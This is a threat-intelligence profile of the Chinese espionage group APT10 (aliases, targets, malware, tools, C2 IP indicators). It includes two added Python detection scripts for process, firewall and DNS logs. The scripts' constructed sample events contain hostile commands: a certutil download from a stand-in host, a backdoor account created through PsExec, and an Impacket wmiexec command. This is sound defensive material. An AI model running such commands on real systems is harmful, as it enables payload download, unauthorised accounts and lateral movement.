APT10 is a Chinese state-sponsored cyber espionage group, active since at least 2009 and assessed (including in the 2018 US Department of Justice indictment) to operate on behalf of the Chinese Ministry of State Security (MSS). The group is also tracked under aliases such as Stone Panda, MenuPass, Red Apollo, Cicada and POTASSIUM; "Cloud Hopper" is the name given to its long-running campaign against managed service providers rather than a separate group name. APT10 is known for large-scale, persistent campaigns against organizations worldwide aimed at espionage and intellectual property theft.
Key Characteristics
• Affiliation: Chinese Ministry of State Security (MSS), specifically the Tianjin State Security Bureau.
• Primary Objectives: Espionage, theft of military and business secrets, and support of Chinese national security and economic interests.
• Active Since: At least 2009 (possibly as early as 2006).
• Target Sectors: Construction, engineering, aerospace, telecommunications, government, healthcare, technology, and managed service providers (MSPs).
• Geographic Reach: Victims on six continents, with particular concentration in the United States, Japan and Europe.
Tactics, Techniques, and Tools
• Initial Access: Spearphishing (malicious .lnk shortcut attachments, double-extension filenames such as document.pdf.exe, and decoy documents opened alongside the payload), and compromise of MSPs to pivot into their clients' networks over legitimate remote-administration channels.
• Persistence and Evasion: Long dwell times sustained through "living off the land" techniques, DLL side-loading of backdoors into signed, legitimate executables, and custom multi-stage loaders that keep the final payload off disk.
• Malware Arsenal:
• HAYMAKER (ChChes/Scorpion)
• SNUGRIDE
• BUGJUICE (RedLeaves, which shares code with PlugX)
• QUASARRAT (xRAT)
• PlugX, ScanBox, UPPERCUT (ANEL), Hartip, Ecipekac, SodaMaster, P8RAT and FYAnti (the last four from the A41APT campaign reported by Kaspersky), and the Impacket toolkit (an open-source tool rather than malware, used for lateral movement).
• Ransomware families Rook, Pandora, AtomSilo, LockFile and Night Sky have been reported in activity that overlaps with APT10 tooling (the shared HUI Loader); Secureworks attributes that activity to a cluster it tracks as Bronze Starlight, so their link to APT10 proper should be treated as an overlap, not a firm attribution.
• Tools Used: certutil, AdFind, Cobalt Strike, Mimikatz, PowerShell, Impacket (wmiexec), PsExec, and more.
• Techniques: Exploitation of vulnerabilities in public-facing systems (including zero-days), supply chain attacks via compromised MSPs and IT service providers, and use of legitimate administrative tools so that malicious activity blends with routine administration.
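Most of the techniques above leave traces in process-creation telemetry that can be matched with simple rules: a mail client spawning a .lnk or double-extension file, certutil fetching or decoding a payload, the stdout/stderr redirection Impacket's wmiexec.py appends to every remote command, and PSEXESVC as a parent process. The script below is an added example, not code from the page or from any vendor report on APT10; the events are constructed to look like Sysmon Event ID 1 records, and the regexes are assumptions tuned to those samples rather than production-grade signatures.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style). Not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c start "" "C:\Users\u\AppData\Local\Temp\invoice.pdf.lnk"'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://198.51.100.7/update.txt C:\Users\Public\u.dat"},
    {"parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1700000000.12 2>&1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\u\notes.txt"},
    {"parent": r"C:\Windows\PSEXESVC.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c net user backup Passw0rd! /add"},
]

# Document-looking name followed by an executable/script extension (invoice.pdf.exe, report.doc.lnk).
DOUBLE_EXT = re.compile(
    r"\.(?:pdf|docx?|xlsx?|pptx?|txt|jpe?g|png)\.(?:exe|scr|lnk|js|vbs|hta)\b", re.I)
# Default redirection Impacket's wmiexec.py wraps around every command it runs on the target.
WMIEXEC_REDIRECT = re.compile(r"1>\s*\\\\127\.0\.0\.1\\ADMIN\$\\__\S*\s+2>&1", re.I)


def basename(path):
    """Lower-cased final path component, tolerant of forward or back slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_lure_from_mail(ev):
    """Mail client launching a shortcut or double-extension file: the spearphishing lure firing."""
    cl = ev["cmdline"]
    return basename(ev["parent"]) == "outlook.exe" and (
        ".lnk" in cl.lower() or DOUBLE_EXT.search(cl) is not None)


def rule_certutil_download(ev):
    """certutil abused as a downloader (-urlcache) or to decode a base64-wrapped payload (-decode)."""
    cl = ev["cmdline"].lower()
    return basename(ev["image"]) == "certutil.exe" and ("-urlcache" in cl or "-decode" in cl)


def rule_wmiexec(ev):
    """WMI provider host spawning cmd.exe with the wmiexec.py redirection signature."""
    return basename(ev["parent"]) == "wmiprvse.exe" and WMIEXEC_REDIRECT.search(ev["cmdline"]) is not None


def rule_psexec_service(ev):
    """Anything spawned by (or being) the PsExec service binary."""
    return "psexesvc.exe" in (basename(ev["parent"]), basename(ev["image"]))


RULES = {
    "lure_from_mail": rule_lure_from_mail,
    "certutil_download": rule_certutil_download,
    "wmiexec": rule_wmiexec,
    "psexec_service": rule_psexec_service,
}


def evaluate(events):
    """Return (event_index, rule_name) for every rule that fires on every event."""
    hits = []
    for i, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((i, name))
    return hits


if __name__ == "__main__":
    for idx, name in evaluate(SAMPLE_EVENTS):
        print(f"[{name}] {SAMPLE_EVENTS[idx]['cmdline']}")
```

The wmiexec rule is the one worth keeping even once an attacker renames everything else: the `1> \\127.0.0.1\ADMIN$\__<timestamp> 2>&1` redirection is how Impacket collects command output over SMB, and it appears regardless of which command was run. The certutil rule will also fire on legitimate certificate-enrollment scripts, so pair it with the download URL or the destination path before alerting.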
Associated IP addresses
APT10 is known to use dynamic DNS services (such as No-IP) and cloud hosting providers (such as Akamai and AS-CHOOPA) for command-and-control (C2) infrastructure, so its IP addresses are volatile and often short-lived. Recent campaigns (2024–2025) attributed to Earth Kasha, a cluster Trend Micro assesses as part of the APT10 umbrella, have used domains registered through providers such as Namecheap and Tucows, with C2 servers rotating IPs frequently to outlive blocklists. Treat the addresses below as point-in-time indicators: confirm they still resolve to or host attacker infrastructure (passive DNS, hosting-provider records) before blocking, and do not widen a match to the enclosing /24 without evidence that the rest of the block is attacker-controlled.
- 27.102.128.157
- 27.102.127.80
- 27.102.127.75
- 27.102.66.67
- 27.102.115.249
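Because the profile lists both exact IPs and a dynamic-DNS provider, a matcher should treat the two differently: an exact hit on a listed IP is high confidence, while a query under a dynamic-DNS zone is only a lead. The script below is an added example, not code from the page; the IP list is copied from the indicators above, the No-IP zone names are an assumption for illustration, and the firewall and DNS log lines are constructed.

```python
import ipaddress
import re

# Indicators copied from the profile above.
IP_INDICATORS = ["27.102.128.157", "27.102.127.80", "27.102.127.75", "27.102.66.67", "27.102.115.249"]
# Assumed free No-IP zones; extend from the provider's published list in practice.
DYNDNS_ZONES = ("ddns.net", "hopto.org", "no-ip.org", "zapto.org", "myftp.org")

# Constructed sample logs (not real traffic).
FW_LOG = [
    "2025-01-10T10:00:01Z src=10.1.2.3 dst=27.102.128.157 dport=443 action=allow",
    "2025-01-10T10:00:05Z src=10.1.2.3 dst=93.184.216.34 dport=443 action=allow",
    "2025-01-10T10:01:11Z src=10.1.2.9 dst=27.102.66.67 dport=80 action=allow",
]
DNS_LOG = [
    "2025-01-10T10:00:00Z client=10.1.2.3 query=update-svc.ddns.net type=A answer=27.102.128.157",
    "2025-01-10T10:00:04Z client=10.1.2.3 query=www.example.com type=A answer=93.184.216.34",
    "2025-01-10T10:02:30Z client=10.1.2.9 query=cdn-cache.hopto.org type=A answer=203.0.113.5",
]

FW_RE = re.compile(r"src=(\S+) dst=(\S+)")
DNS_RE = re.compile(r"client=(\S+) query=(\S+) type=\S+ answer=(\S+)")


def load_ip_indicators(raw):
    """Parse the indicator list, dropping malformed entries and non-global (private, loopback,
    reserved) addresses; a stray RFC 1918 address in a copied list would flood the match output."""
    good = set()
    for s in raw:
        try:
            ip = ipaddress.ip_address(s.strip())
        except ValueError:
            continue
        if ip.is_global:
            good.add(ip)
    return good


def match_firewall(lines, indicators):
    """High-confidence hits: (internal source, listed destination) for every flow to a listed IP."""
    hits = []
    for line in lines:
        m = FW_RE.search(line)
        if not m:
            continue
        try:
            dst = ipaddress.ip_address(m.group(2))
        except ValueError:
            continue
        if dst in indicators:
            hits.append((m.group(1), str(dst)))
    return hits


def match_dns(lines, indicators, zones=DYNDNS_ZONES):
    """Two tiers: queries whose answer is a listed IP (catches a new name pointing at known
    infrastructure), and queries under dynamic-DNS zones (lower confidence, triage only)."""
    resolved, dyndns = [], []
    suffixes = tuple("." + z for z in zones)
    for line in lines:
        m = DNS_RE.search(line)
        if not m:
            continue
        client, qname, answer = m.groups()
        try:
            ans = ipaddress.ip_address(answer)
        except ValueError:
            continue
        if ans in indicators:
            resolved.append((client, qname, answer))
        if qname.lower().rstrip(".").endswith(suffixes):
            dyndns.append((client, qname))
    return resolved, dyndns


if __name__ == "__main__":
    iocs = load_ip_indicators(IP_INDICATORS)
    print("firewall:", match_firewall(FW_LOG, iocs))
    resolved, dyndns = match_dns(DNS_LOG, iocs)
    print("resolved to IOC:", resolved)
    print("dynamic DNS queries:", dyndns)
```

Correlating the two logs is the point: the DNS answer tier tells you which hostname the implant used to reach a listed IP, which is what you need to pivot on when the operator rotates the address but keeps the dynamic-DNS name.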